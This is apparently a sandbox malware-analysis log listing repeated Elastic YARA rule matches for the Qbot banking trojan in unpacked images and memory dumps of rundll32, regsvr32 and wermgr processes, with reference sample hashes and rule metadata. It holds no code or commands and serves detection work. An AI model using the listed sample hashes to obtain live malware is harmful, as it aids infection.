          Source: 4.3.rundll32.exe.2fa0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.3.rundll32.exe.2fa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.3.rundll32.exe.2fa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.3.rundll32.exe.b90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.3.rundll32.exe.b90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.3.regsvr32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.3.regsvr32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 8.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 8.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.2.regsvr32.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.2.regsvr32.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.2.rundll32.exe.2cc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.2.rundll32.exe.2cc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.2.regsvr32.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.2.regsvr32.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.3.regsvr32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.3.regsvr32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.2.rundll32.exe.2cc0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.2.rundll32.exe.2cc0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.0.wermgr.exe.1000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.0.wermgr.exe.1000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 8.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 8.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.2.rundll32.exe.4820000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.2.rundll32.exe.4820000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.0.wermgr.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.0.wermgr.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
